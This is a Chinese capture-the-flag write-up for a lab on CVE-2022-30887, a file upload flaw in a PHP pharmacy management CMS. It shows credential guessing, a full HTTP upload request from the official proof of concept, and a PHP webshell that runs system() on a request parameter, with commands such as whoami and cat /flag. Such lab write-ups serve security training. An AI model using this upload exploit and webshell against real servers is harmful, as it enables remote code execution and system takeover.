春秋云境:CVE-2022-30887(文件上传漏洞)

目录

一.题目

二.蚁剑方式

三.POC方式


一.题目

春秋云境:CVE-2022-30887(文件上传漏洞)_第1张图片

 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

 进入页面:登录页面 

春秋云境:CVE-2022-30887(文件上传漏洞)_第2张图片

随意输入用户名和密码:[email protected] admin 用于burp抓包: 

春秋云境:CVE-2022-30887(文件上传漏洞)_第3张图片

 burp抓包如下:好像没有可以利用的。。。

春秋云境:CVE-2022-30887(文件上传漏洞)_第4张图片

先看看有什么地方可以点击吧。

好像Mayurik可以点击

春秋云境:CVE-2022-30887(文件上传漏洞)_第5张图片

点击进入:

春秋云境:CVE-2022-30887(文件上传漏洞)_第6张图片

 页面滑动到最下面----随意点击:

春秋云境:CVE-2022-30887(文件上传漏洞)_第7张图片

 会弹出来作者邮箱:

春秋云境:CVE-2022-30887(文件上传漏洞)_第8张图片

[email protected]

密码我们猜:mayurik(刚刚可点击的连接,可能也是作者的昵称)

二.蚁剑方式

春秋云境:CVE-2022-30887(文件上传漏洞)_第9张图片

 成功进入:

春秋云境:CVE-2022-30887(文件上传漏洞)_第10张图片

发现这里可以上传文件:

春秋云境:CVE-2022-30887(文件上传漏洞)_第11张图片

上传一句话木马:

春秋云境:CVE-2022-30887(文件上传漏洞)_第12张图片

 如图:

春秋云境:CVE-2022-30887(文件上传漏洞)_第13张图片

 蚁剑连接:

注意编码器要选base64

春秋云境:CVE-2022-30887(文件上传漏洞)_第14张图片

 连接页面:

春秋云境:CVE-2022-30887(文件上传漏洞)_第15张图片

 根目录下找到flag

春秋云境:CVE-2022-30887(文件上传漏洞)_第16张图片

 查看flag:

flag{06c8e76e-c7ca-44c4-b27c-f48fc4d8f060}春秋云境:CVE-2022-30887(文件上传漏洞)_第17张图片

三.POC方式

 该漏洞已被国家cnnvd收入:

国家信息安全漏洞库

春秋云境:CVE-2022-30887(文件上传漏洞)_第18张图片

可以看到漏洞的基本信息:

春秋云境:CVE-2022-30887(文件上传漏洞)_第19张图片

官方的POC:

春秋云境:CVE-2022-30887(文件上传漏洞)_第20张图片

 POC

春秋云境:CVE-2022-30887(文件上传漏洞)_第21张图片

POC的代码如下:

POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg


-----------------------------208935235035266125502673738631 Content-Disposition: form-data; name="btn" -----------------------------208935235035266125502673738631--

shell.php

if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?> 

burp上传:

春秋云境:CVE-2022-30887(文件上传漏洞)_第22张图片

访问ip:port/assets/myimages/shell.php?s=xxx

通过上传的shell即可进行命令执行

?s=whoami春秋云境:CVE-2022-30887(文件上传漏洞)_第23张图片

?s=dir 查看

春秋云境:CVE-2022-30887(文件上传漏洞)_第24张图片

官方POC也给出了图片路径,访问shell并获取flag:

?s=cat /flag

春秋云境:CVE-2022-30887(文件上传漏洞)_第25张图片

你可能感兴趣的:(i春秋,php,安全,开发语言,web安全,网络安全)